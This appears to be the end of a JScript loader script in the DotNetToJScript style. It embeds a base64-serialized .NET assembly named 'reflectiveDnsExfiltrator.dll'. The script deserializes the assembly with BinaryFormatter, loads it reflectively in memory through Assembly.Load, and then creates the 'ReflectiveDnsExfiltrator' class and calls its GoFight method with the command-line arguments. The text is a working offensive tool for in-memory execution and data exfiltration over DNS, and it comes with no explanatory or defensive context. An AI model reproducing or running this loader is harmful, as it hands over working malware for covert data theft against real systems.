"BRUSCQEFBwADAR0FCAgCBggECAAAAAQFAAAAAgYOQEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0A"+
"TgBPAFAAUQBSAFMAVABVAFYAVwBYAFkAWgAyADMANAA1ADYANwAEIAEBCAQgAQECBQEAAQAABAAA"+
"Eh0DIAAOBQACAQ4cBCABAg4FAAEBESUDBwECBSACDg4OAwcBDgYgAR0OHQMEBwEdAwQgAQgDBAAB"+
"CA4EAAEODgQAAQIOBQACDg4cBAEAAAADBhEYBwACARJJEU0MEAECAhUSCQEeAB4AAwoBCAggAwES"+
"XRFhAgUgARJlDgQgABJdBSABARJdBQABHQUOBSABAR0FBiACCgoRcQQAABJ1BSABHQUOBCAAHQUD"+
"IAAIBgADDg4cHAUAAQ4dDgUgAgEOCAQgABJ9ByADAR0FCAgHIAMIHQUICAUAAggICAUgAg4ICAYA"+
"Aw4ODg4EAAEBCDEHIw4ODg4IDggODggICAgSVRJZEmUSXRJpCAgICAgdBRJ5En0IEoCNDggICAId"+
"Ax0ODBABAR0eABUSCQEeAAMKAQUEBwEdBQQAAQUICAYVEoCRAggFAwcBBQkAAhUSCQEICAgHFRKA"+
"kQIIBQUgAgEcGBgQAgIVEgkBHgEVEgkBHgAVEoCRAh4AHgEECgIIBQkHBR0FCAgdBQIDBh0FBCAB"+
"BQUHFRKAkQIFBQQKAgUFCQcCEhwVEgkBBQQgAQMIBiABEoCVAwwHCBKAlQgIBQgIDgIIAQAIAAAA"+
"AAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBtEQAAAAAAAAAAAAAzkQAAAAgAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAMBEAAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAA"+
"AP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAA"+
"AAAAAAAAAAAAAAABAAAAAABIAAAAWGAAAIwCAAAAAAAAAAAAAIwCNAAAAFYAUwBfAFYARQBSAFMA"+
"SQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAQAAAAC"+
"AAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIA"+
"YQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsATsAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBm"+
"AG8AAADIAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAA"+
"dABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAw"+
"AC4AMAAAAFwAHQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAcgBlAGYAbABlAGMAdABpAHYA"+
"ZQBEAG4AcwBFAHgAZgBpAGwAdAByAGEAdABvAHIALgBkAGwAbAAAAAAAKAACAAEATABlAGcAYQBs"+
"AEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAGQAHQABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4A"+
"YQBtAGUAAAByAGUAZgBsAGUAYwB0AGkAdgBlAEQAbgBzAEUAeABmAGkAbAB0AHIAYQB0AG8AcgAu"+
"AGQAbABsAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAA"+
"LgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADAALgAwAC4AMAAu"+
"ADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAABAAAAMAAAA4DQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAQ0AAAAEAAAACRcAAAAJBgAAAAkWAAAABhoAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1i"+
"bHkgTG9hZChCeXRlW10pCAAAAAoL";
var entry_class = 'ReflectiveDnsExfiltrator.ReflectiveDnsExfiltrator';
try {
setversion();
var stm = base64ToStream(serialized_obj);
var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
var al = new ActiveXObject('System.Collections.ArrayList');
var n = fmt.SurrogateSelector;
var d = fmt.Deserialize_2(stm);
al.Add(n);
var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
var args = "";
for (var i = 0; i < WScript.Arguments.length-1; i++) {
args += WScript.Arguments(i) + "|";
}
args += WScript.Arguments(i);
o.GoFight(args);
} catch (e) {
debug(e.message);
}